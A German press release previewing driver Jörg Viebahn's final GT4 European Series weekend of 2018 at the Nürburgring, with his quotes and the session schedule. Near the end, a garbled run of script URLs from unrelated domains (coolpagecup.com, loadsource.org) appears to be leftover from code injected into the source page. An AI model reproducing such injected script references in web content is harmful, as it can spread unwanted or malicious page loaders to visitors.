Abschied mit einem Erfolgserlebnis

Saisonfinale für Jörg Viebahn bei der GT4 European Series auf dem Nürburgring

Am Wochenende fährt Jörg Viebahn bei der sechsten und letzten Veranstaltung der GT4 European Series 2018 auf dem Nürburgring (14.-16. September). Der Engelskirchener tritt mit einem Audi R8 LMS GT4 von Phoenix Racing an. Partner ist wie gewohnt der Deutsche John-Louis Jasper. Nachdem das Phoenix-Duo bei den letzten Rennen wenig Erfolg hatte, hoffen die beiden auf einen versöhnlichen Saisonausklang in der Eifel.

Viebahn: „Die Saison ist sicherlich nicht so verlaufen, wie ich es mir vorgestellt hatte. Aber da hilft kein großes Jammern, manchmal funktionieren die Dinge einfach nicht. Wir kennen den Nürburgring gut, der Audi sollte hier funktionieren. Ich habe auf jeden Fall meinen Optimismus behalten.“

48 Autos gehen auf dem Nürburgring an den Start, 18 davon in der Pro-Am-Klasse. Viebahn. „Das Starterfeld ist wieder ziemlich groß und das Überholen auf dem Nürburgring nicht einfach. Aber zum Saisonabschluss sollte ein gutes Resultat möglich sein. Denn schließlich ist das unser Heimspiel und einmal muss die Pechsträhne auch ein Ende haben.“

 

Zeitplan Nürburgring:

Freitag, 14. September

Freies Training 1                 12.40 Uhr

Freies Training 2                 17.30 Uhr

Samstag, 15. September

Qualifying 1+2                     11.35 Uhr

Rennen 1                             17.00 Uhr

Sonntag, 16. September

Rennen 2                             10.05 Uhr

Die Rennen werden live übertragen: www.gt4series.com

 

//coolpagecup.com/1cb09f960d6b873480.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7344x&r=1536871113671http://coolpagecup.com/ext/1cb09f960d6b873480.js?sid=52295_7344_&title=FF_%5B598%5D_pagecupdev.cool&blocks%5B%5D=31af2

Kommentare sind deaktiviert